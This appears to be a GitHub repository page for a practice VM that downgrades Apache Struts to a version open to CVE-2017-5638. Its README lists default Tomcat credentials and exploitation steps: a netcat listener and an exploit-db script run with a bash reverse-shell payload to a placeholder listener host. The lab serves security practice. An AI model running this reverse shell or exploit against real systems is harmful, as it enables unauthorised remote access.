Skip to content

Tobey123/vuln-struts2-vm

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits

ansible

ansible

 
 

app

app

 
 

.gitignore

.gitignore

 
 

README.md

README.md

 
 

Vagrantfile

Vagrantfile

 
 

Repository files navigation

A Vulnerable Apache Struts Application

Confirmed Vulnerabilities

CVE Description URL
2017-5638 Remote Command Vulnerability in Apache Struts https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638

Requirements:

Setup

$ git clone https://github.com/evolvesecurity/vuln-struts2-vm.git
$ cd vuln-struts2-vm

Build Virtual Machine

IMPORTANT: The VM currently uses "public networking" (See: Vagrantfile). This should only be used on a secure LAN. Otherwise, "private networking" should be used.

See: https://www.vagrantup.com/docs/virtualbox/networking.html

$ vagrant up # this will raise and provision your machine
$ vagrant ssh
# to get the IP of your machine if unknown:
ubuntu@strut $ ip route

Verification:

You should no visit http://IP:8080 to see if tomcat8 is working. If the url is unavailable, try http://IP:8080/manager with the credentials "tomcat" and "tomcat".

Exploitation:

Open a terminal, then run the command below to start a TCP listner.

$ nc -nvlp 5556

Open a separate terminal, then run the commands to carry out the exploit with a reverse shell. Replace IP-TARGET with the target IPv4 address. Replace IP-LISTNER with your listening host's IPv4 address.

# download exploit from https://www.exploit-db.com/exploits/41570/
# or use searchsploit
$ searchsploit Struts #optional
$ cp /path/to/linux/webapps/41570.py exploit.py
$ python exploit.py "http://IP-TARGET:8080/http-session/hello.action" "bash -i >& /dev/tcp/IP-LISTENER/5556 0>&1"

It may be necessary to modify your exploit.py in order to pass in the command you want.

One option to confirm your exploit is to simply setup a netcat listener and connect back to it.

Troubleshooting:

If you wish to ssh directly into your vm without using the vagrant ssh command, you need to set a password for the ubuntu user. First, ssh into the vm using vagrant ssh and then perform a password reset using passwd ubuntu.

Credits:

The source code for the Apache Struts2 applications was taken from https://github.com/apache/struts-examples. The pom.xml files were modified slightly in order to downgrade Apache Struts2 to a vulnerable version.

About

An Ubuntu 16.04 VM Vulnerable to CVE 2017-5638

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Java 53.5%
  • HTML 44.8%
  • CSS 1.7%